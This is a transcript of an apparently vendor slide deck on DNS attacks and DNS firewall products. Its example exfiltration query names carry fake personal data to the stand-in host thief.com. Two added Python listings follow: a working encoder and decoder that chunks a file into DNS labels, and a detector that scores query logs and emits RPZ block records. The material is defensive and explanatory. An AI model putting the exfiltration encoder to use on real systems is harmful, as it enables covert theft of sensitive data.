20150928-plnog15___dns-to-zlo-public

1 | © 2013 Infoblox Inc. All Rights Reserved. 1 | © 2015 Infoblox Inc. All Rights Reserved. CONFIDENTIAL

Transcript of 20150928-plnog15___dns-to-zlo-public

Page 1: 20150928-plnog15___dns-to-zlo-public

DNS as the source of all evil in the network. Or: how to become your users' superhero
(original title: DNS źródłem całego zła w sieci. Czyli jak zostać superbohaterem twoich użytkowników)

Adam Obszyński, [email protected]

Page 2: 20150928-plnog15___dns-to-zlo-public

Why Securing DNS is Critical

Unprotected, DNS increases risk to critical infrastructure and data:

• #1 protocol for volumetric reflection/amplification attacks
• DNS is critical networking infrastructure
• The DNS protocol is easy to exploit and attacks are prevalent
• Traditional security is ineffective against evolving threats

Page 3: 20150928-plnog15___dns-to-zlo-public

DNS Security Gap

• One of the fastest growing attack vectors
• Easy-to-exploit protocol
• Firewalls and IDS/IPS devices are not focused on DNS threats
• Proliferation of BYOD devices and mobile users, meaning threats may be inside the firewall
• A DNS security layer is needed to complement existing security solutions

Page 4: 20150928-plnog15___dns-to-zlo-public

DNS Security Challenges

1. Defending against DNS DDoS attacks
2. Stopping APTs/malware from using DNS
3. Preventing data exfiltration via DNS

Page 5: 20150928-plnog15___dns-to-zlo-public

DNS Protection is Not Only About DDoS

Volumetric/DDoS attacks:
• DNS reflection
• DNS amplification
• TCP/UDP/ICMP floods
• NXDOMAIN attack (floods of queries for names that do not exist, filling the resolver's negative cache and exhausting it)
• Phantom domain attack (queries to attacker domains whose name servers never answer, so the resolver sits waiting on them)
• Random subdomain attack (random labels under a victim zone, so recursive resolvers hammer the victim's authoritative servers)
• Domain lockup attack (attacker name servers hold resolver connections open with slow or junk responses)

DNS-specific exploits:
• DNS-based exploits
• DNS cache poisoning
• DNS tunneling
• Protocol anomalies
• Reconnaissance
• DNS hijacking

Page 6: 20150928-plnog15___dns-to-zlo-public

APTs: The New Threat Landscape

• Malicious traffic is visible on 100% of corporate networks [1]
• Every minute a host accesses a malicious website [1]
• The question isn't if, but when you will be attacked, and how effectively you can respond
• APTs rely on DNS at various stages of the cyber kill chain to infect devices, propagate malware, and exfiltrate data

Source: [1] Cisco 2014 Annual Security Report

How APT actors operate:
• Organized and well funded
• Profile organizations using public data/social media
• Target key persons of interest (POIs) via spear phishing
• "Watering hole" target groups on trusted sites
• Leverage tried-and-true techniques like SQLi, DDoS & XSS
• Coordinated attacks: distract big, strike precisely
• Operational sophistication

Page 7: 20150928-plnog15___dns-to-zlo-public

Malware Examples

CryptoLocker
• Targets Windows-based computers, delivered as an email attachment
• Upon infection, encrypts files on the local hard drive and on mapped network drives
• If the ransom isn't paid, the encryption key is deleted and the data is irretrievable

Gameover Zeus (GOZ)
• 500,000 – 1M infections globally and hundreds of millions of dollars stolen
• Uses P2P communication to control the infected devices (the botnet)
• Takes control of private online transactions and diverts funds to criminal accounts

Page 8: 20150928-plnog15___dns-to-zlo-public

DNS Tunneling

• Uses DNS as a covert communication channel to bypass firewalls
• The attacker tunnels other protocols like SSH, TCP, or web within DNS
• Enables attackers to easily pass stolen data or tunnel IP traffic without detection
• A DNS tunnel can be used as a full remote-control channel for a compromised internal host

Impact:
• Data exfiltration or malware insertion can happen through the tunnel

Diagram: a client-side tunnel program inside the ENTERPRISE sends IP traffic encoded in DNS queries to a DNS terminal server on the INTERNET, which turns it back into IP traffic to the Internet.

Page 9: 20150928-plnog15___dns-to-zlo-public

Data Exfiltration over DNS Queries: Malware Steals a File Containing Sensitive Data

• The infected endpoint gets access to a file containing sensitive data
• It encrypts the data and converts it into an encoded format
• The text is broken into chunks and sent via DNS, either as hostname.subdomain labels in queries or in TXT records
• The exfiltrated data is reconstructed at the other end
• Can use spoofed addresses to avoid detection

Diagram: the infected endpoint in the ENTERPRISE sends queries such as
  NameMarySmith.foo.thief.com
  MRN100045429886.foo.thief.com
  DOB10191952.foo.thief.com
through the DNS server to the attacker's controller server for thief.com on the INTERNET (C&C), which receives the data and returns C&C commands.

Page 10: 20150928-plnog15___dns-to-zlo-public

How Infoblox Secures DNS

Page 11: 20150928-plnog15___dns-to-zlo-public

Hardened DNS Appliances

Conventional server approach:
• Multiple open ports: many open ports are subject to attack
• Users have OS-level account privileges on the server
• Requires time-consuming manual updates

Hardened appliance approach:
• Limited port access: dedicated hardware with no unnecessary logical or physical ports
• Secure access: no OS-level user accounts, only admin accounts; no SSH or root-shell access; secure HTTPS-based access to device management; encrypted device-to-device communication
• Update service: immediate updates for new security threats
• Hardware-based security & DNS acceleration

Page 12: 20150928-plnog15___dns-to-zlo-public

Internal DNS Security Deployment

Diagram: Infoblox Internal DNS Security sits inside the ENTERPRISE behind the firewall and receives updates for DNS attacks and malicious domains from the Infoblox Automated Threat Intelligence Service on the INTERNET. Four traffic cases are shown:
• Legitimate query to Good.com: passes
• DNS DDoS attacks from the attacker: detected and dropped
• Data exfiltration by the thief, e.g. SSN:123456789.foo.thief.com and PESEL:77050502143.foo.thief.com (PESEL is the Polish national ID number): detected and dropped
• Malware sites Badsite1.com, Badsite2.com, Badsite3.com: blocked

Page 13: 20150928-plnog15___dns-to-zlo-public

Protection Against Internal DNS Attacks

Attacks detected and dropped by Infoblox Internal DNS Security:
• DNS reflection
• DNS amplification
• TCP/UDP/ICMP floods
• NXDOMAIN attack
• Phantom domain attack
• Random subdomain attack
• Domain lockup attack
• DNS-based exploits
• DNS cache poisoning
• DNS tunneling
• Malformed DHCP requests

Diagram: legitimate traffic passes through Infoblox Internal DNS Security (inside the ENTERPRISE, behind the firewall), while DNS DDoS and DNS tunneling traffic are detected and dropped; the Infoblox Automated Threat Intelligence Service on the INTERNET feeds the appliance.

Page 14: 20150928-plnog15___dns-to-zlo-public

Protection Against APTs/Malware: DNS Firewall

1. An infected device is brought into the office. Malware spreads to other devices on the network.
2. The malware makes a DNS query to find "home" (botnet / C&C). DNS Firewall looks at the DNS response and takes an admin-defined action (disallows communication to the malware site, or redirects traffic to a landing page or "walled garden" site). The blocked communication attempt is sent to Syslog.
3. Pinpoint. Infoblox Reporting lists the DNS Firewall action as well as the:
   • Device IP address
   • Device MAC address
   • Device type/OS (DHCP fingerprint)
   • Device host name
   • Device lease history
   • AD login name
   • Switch/port/VLAN
4. An update (the Infoblox threat update: IPs, domains, etc. of bad servers) occurs every 2 hours, or more often for a significant threat.

Diagram: malware/APT on the INTRANET spreads within the network and calls home; the Infoblox threat update on the INTERNET supplies the malicious domains.

Page 15: 20150928-plnog15___dns-to-zlo-public

Automatic and Customizable Threat Intelligence: DNS Firewall

Infoblox DNS Firewall consumes:
• Pre-defined lists: malware droppers, botnet C&C/DNS servers, geographic blocks, inbound attacks
• User-defined lists and user-defined RPZ behaviors
• Custom feeds

• Automatic ongoing protection against APTs/malware without intervention, downtime or patching
• Choose from lists of threat categories and sources
• Implement whitelists, blacklists, and RPZ actions based on client
• Benefits: flexibility and performance

Page 16: 20150928-plnog15___dns-to-zlo-public

DNS Tunneling vs DNS Exfiltration

What is DNS data exfiltration?
• Tunneling is the mechanism by which attackers exfiltrate data
• Tunneling is also used to bypass paid Wi-Fi hotspots and to deliver anti-virus updates

Malware frequently uses DNS to exfiltrate data
• Hackers know that the DNS port is always open and available
• Stolen data is broken into small chunks, often encrypted and encoded to avoid detection
• Exfiltrated data is decrypted and reassembled at the other end

This detection IS NOT a substitute for Data Loss Prevention (DLP) products
• DLP products protect against leakage via email, web, FTP and other vectors
• We cover one use case, one that these products typically don't, but not the whole market

Data exfiltration via host/subdomain (simplified, unencrypted example):
  Jane-Doe.foo.thief.com
  SSN-543112197.foo.thief.com
  DOB-04-10-1999.foo.thief.com
  MC-7895206822348781.foo.thief.com
  CCV-567-E-10-21.foo.thief.com
  John-Public.bar.thief.com
  SSN-9845762093.bar.thief.com
  DOB-01-22-1943.bar.thief.com
  V-3850384711230911.bar.thief.com
  CCV-434-E-11-19.bar.thief.com

Example malware that uses DNS tunnels: FrameworkPOS, FeederBot, Moto, Morto, PlugX, Win32.Zbot.chas/Unruy.H, Win32.Mufanom.vha, Win32.AutoTsifiri.n, Win32.Hiloti

Page 17: 20150928-plnog15___dns-to-zlo-public

Data Exfiltration via DNS Tunneling: Real Customer Example

• A file containing sensitive info was converted to text, broken into chunks and exfiltrated via DNS
• The exfiltrated data was put back together and decrypted to get the valuable information
• Spoofed addresses were used
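The chunking mechanism described on pages 9, 16 and 17 (file converted to text, broken into chunks, carried as hostname.subdomain labels, reassembled at the other end), written out as an added lab example. This is not code from the presentation, from the customer case, or from any Infoblox product: the sample record is constructed fake data, `foo.exfil.example` is a hypothetical attacker zone standing in for the deck's foo.thief.com, and the encryption step the deck mentions is left out in favour of plain base32 so the labels stay readable. Nothing here touches the network; it only builds and parses query names, which is what a detection engineer needs to generate test traffic.

```python
import base64
import math
import re

# Constructed sample "sensitive file": fake data, not from the presentation's customer case.
SAMPLE_RECORD = b"Name=MarySmith;MRN=100045429886;DOB=10191952\n"

# Hypothetical attacker-controlled zone for the lab; the deck's examples use foo.thief.com.
EXFIL_DOMAIN = "foo.exfil.example"

# RFC 1035 limits: a label is at most 63 octets and a whole name at most 253 characters
# in text form; an encoder that ignores them produces queries the resolver refuses.
MAX_LABEL = 63
MAX_NAME = 253
SEQ_LABEL = re.compile(r"^(\d+)-(\d+)$")


def encode_chunks(data, domain, session="s1", chunk_bytes=30):
    """Turn `data` into query names <seq>-<total>.<session>.<base32 chunk>.<domain>,
    the hostname.subdomain pattern the deck shows. Base32 keeps every label inside
    the hostname alphabet; lower case survives case-insensitive resolvers unchanged."""
    total = math.ceil(len(data) / chunk_bytes)
    names = []
    for seq in range(total):
        chunk = data[seq * chunk_bytes:(seq + 1) * chunk_bytes]
        b32 = base64.b32encode(chunk).decode().rstrip("=").lower()
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join([f"{seq}-{total}", session] + labels + [domain])
        if len(name) > MAX_NAME:
            raise ValueError(f"chunk {seq} gives a {len(name)}-char name, over {MAX_NAME}")
        names.append(name)
    return names


def decode_chunks(names, domain):
    """Reassemble at the other end: ignore unrelated names, re-order chunks that arrived
    out of order (resolvers, retries and caching reorder them), drop duplicates, and
    refuse to return a silently truncated file when a chunk never arrived."""
    suffix = "." + domain
    chunks, total = {}, None
    for name in names:
        if not name.lower().endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        m = SEQ_LABEL.match(labels[0])
        if not m or len(labels) < 3:
            continue
        seq, count = int(m.group(1)), int(m.group(2))
        total = total or count
        b32 = "".join(labels[2:]).upper()
        chunks[seq] = base64.b32decode(b32 + "=" * (-len(b32) % 8))
    if total is None:
        return b""
    missing = sorted(set(range(total)) - set(chunks))
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return b"".join(chunks[i] for i in range(total))


def demo():
    """Encode the sample, deliver it reversed with a duplicate, and reassemble."""
    names = encode_chunks(SAMPLE_RECORD, EXFIL_DOMAIN)
    received = names[::-1] + [names[0]]
    return names, decode_chunks(received, EXFIL_DOMAIN)


if __name__ == "__main__":
    names, recovered = demo()
    print("\n".join(names))
    print("reassembled OK:", recovered == SAMPLE_RECORD)
```

The sequence header is what makes the deck's "put back together at the other end" step work over a channel that reorders and duplicates: a resolver may retry, cache, or forward queries through several hops, so the receiver cannot rely on arrival order. The same header is also a detection handle, since every query to the zone then shares a rigid label layout, which the analytics on the later pages pick up.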

Page 18: 20150928-plnog15___dns-to-zlo-public

Data Exfiltration Protection with Infoblox DNS Threat Analytics

Page 19: 20150928-plnog15___dns-to-zlo-public

How DNS Threat Analytics Works

• DNS Threat Analytics detects tunneling based on the patterns of requests:
  - Looks at TXT, A and AAAA records
  - Finds tunneling by using lexical and temporal analysis, looking for signs that the requests are data exfiltration
  - Adds destinations to an internal RPZ feed automatically
• Products: Internal DNS Security / DNS Firewall

Note: DNS-based detection IS NOT a substitute for Data Loss Prevention products.

Analysis model: entropy, lexical analysis, n-gram frequency, size

Page 20: 20150928-plnog15___dns-to-zlo-public

Behavior analyzed by Infoblox analytics:
• Entropy: generally speaking, queries should not all be uniform in size
• Lexical: are they words?
• N-gram: contiguous sequence of n items
• Time series: number of queries overall, and number of queries to a domain
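The analysis model on pages 19 and 20 (entropy, lexical/n-gram, size, time series per domain) and the RPZ feed output of page 19, run over a constructed query log, as an added example. It is not Infoblox's code and does not describe the real scoring inside DNS Threat Analytics: the thresholds, the small benign-label corpus that stands in for a lexical model, the "registered domain = last two labels" split (a real deployment uses the public suffix list) and the RPZ record format are all my assumptions. The log lines are made up; the thief.com names copy the deck's examples and the hex labels imitate an encoded chunk.

```python
import math
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed query log (timestamp, client IP, qname, qtype); not real traffic.
QUERY_LOG = """\
2015-09-28T10:00:00 10.1.2.3 www.good.com A
2015-09-28T10:00:01 10.1.2.3 namemarysmith.foo.thief.com A
2015-09-28T10:00:01 10.1.2.3 mrn100045429886.foo.thief.com A
2015-09-28T10:00:02 10.1.2.3 dob10191952.foo.thief.com A
2015-09-28T10:00:02 10.1.2.3 7a9f3c1e0b2d4f6a8c1e3b5d7f9a.foo.thief.com TXT
2015-09-28T10:00:03 10.1.2.3 b1d3f5a7c9e1b3d5f7a9c1e3b5d7.foo.thief.com TXT
2015-09-28T10:00:04 10.1.2.3 mc7895206822348781.foo.thief.com A
2015-09-28T10:00:04 10.1.2.3 ccv567e1021.foo.thief.com A
2015-09-28T10:00:05 10.1.2.7 mail.good.com A
2015-09-28T10:00:30 10.1.2.7 login.good.com AAAA
2015-09-28T10:01:10 10.1.2.3 www.good.com A
2015-09-28T10:01:40 10.1.2.9 images.good.com A
2015-09-28T10:02:05 10.1.2.9 api.good.com A
2015-09-28T10:02:30 10.1.2.7 www.plnog.pl A
"""

# Constructed corpus of common benign labels/words; its character bigrams are the
# stand-in for the "are they words?" lexical/n-gram model (assumption, not Infoblox's).
BENIGN_CORPUS = ("www mail login images api cdn static assets smtp imap ntp time update "
                 "download media video news shop store account search cloud office home "
                 "blog portal intranet vpn wiki").split()
REF_BIGRAMS = {w[i:i + 2] for w in BENIGN_CORPUS for i in range(len(w) - 1)}
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def shannon_entropy(s):
    """Bits per character: 0 for a constant string, log2(n) for n equally likely symbols."""
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def ngram_score(s):
    """Fraction of the string's character bigrams that occur in the benign corpus."""
    grams = [s[i:i + 2] for i in range(len(s) - 1)]
    return sum(g in REF_BIGRAMS for g in grams) / len(grams) if grams else 1.0


def peak_rate(times, window=timedelta(seconds=10)):
    """Largest number of queries inside any window-long interval (the time-series feature)."""
    times, best, left = sorted(times), 0, 0
    for right, t in enumerate(times):
        while t - times[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def domain_features(log):
    """Group queries by registered domain (last two labels; simplification) and compute
    the per-domain analytics over the subdomain part, dots removed."""
    groups = defaultdict(lambda: {"subs": [], "times": []})
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, _client, qname, _qtype = m.groups()
        labels = qname.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue  # a bare registered domain carries no subdomain payload
        g = groups[".".join(labels[-2:])]
        g["subs"].append("".join(labels[:-2]))
        g["times"].append(datetime.fromisoformat(ts))
    feats = {}
    for dom, g in groups.items():
        subs, chars = g["subs"], "".join(g["subs"])
        feats[dom] = {
            "count": len(subs),
            "entropy": sum(shannon_entropy(s) for s in subs) / len(subs),
            "ngram": sum(ngram_score(s) for s in subs) / len(subs),
            "digit_ratio": sum(ch.isdigit() for ch in chars) / len(chars),
            "avg_len": len(chars) / len(subs),
            "peak_10s": peak_rate(g["times"]),
        }
    return feats


def suspicious_domains(log, min_score=3):
    """Score each domain on the five analytics; a domain is flagged only when several
    fire together, so one odd-looking but rare name does not trip the detector."""
    flagged = {}
    for dom, f in domain_features(log).items():
        score = sum([f["entropy"] > 3.0, f["ngram"] < 0.6, f["digit_ratio"] > 0.25,
                     f["avg_len"] > 12, f["count"] >= 5 and f["peak_10s"] >= 5])
        if score >= min_score:
            flagged[dom] = {**f, "score": score}
    return flagged


def rpz_records(domains):
    """RPZ zone records for flagged domains: `CNAME .` is the NXDOMAIN action;
    `CNAME *.` would give NODATA and `CNAME garden.example.` a walled-garden redirect."""
    return "\n".join(f"{d}\tCNAME\t.\n*.{d}\tCNAME\t." for d in sorted(domains))


if __name__ == "__main__":
    bad = suspicious_domains(QUERY_LOG)
    for dom, f in bad.items():
        print(dom, f)
    print(rpz_records(bad))
```

On this log thief.com trips all five checks (high entropy and digit ratio, bigrams unlike the benign corpus, long subdomains, seven queries in four seconds) while good.com and plnog.pl trip none. The per-domain aggregation is what separates a single high-entropy CDN hostname from a tunnel: the time-series and count features only fire when the pattern repeats, which is also why a slow, low-volume exfiltration that stays under the burst threshold needs a longer window or a lower count to catch.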

Page 21: 20150928-plnog15___dns-to-zlo-public

Intelligence Needed to Take Action: Contextual Reporting

• Attack details by category, member, rule, severity, and time
• Drill-down analytics and visualization of the entire network
• List of top infected clients with associated user names (enabled by Microsoft AD integration)
• CISO/Executive report with top APT/malware threats

Page 22: 20150928-plnog15___dns-to-zlo-public

Integrations: Cisco, FireEye, Bit9 etc. Only the team wins!

Page 23: 20150928-plnog15___dns-to-zlo-public

Page 24: 20150928-plnog15___dns-to-zlo-public

Security Product Strategy

Diagram: the Infoblox DDI platform underlies three security pillars, fed by the Global Threat Intelligence Platform:
• Harden DNS: Infoblox External DNS Security facing the INTERNET, absorbing DNS DDoS, exploits, reflection and amplification
• Anti-Malware & Data Exfiltration: Infoblox Internal DNS Security & DNS Firewall on the INTRANET, blocking malicious domains
• Security Operations & Ecosystem: SaaS/Cloud, DDoS, NAC, APT/Malware, SIEM, Business Intelligence

Page 25: 20150928-plnog15___dns-to-zlo-public

Find DNS Threats in your Network

Page 26: 20150928-plnog15___dns-to-zlo-public

Send Us Your PCAP Files

• Infoblox analyzes them and provides insights on malicious activity in seconds
• A report on the findings to take back to management

Page 27: 20150928-plnog15___dns-to-zlo-public

Q&A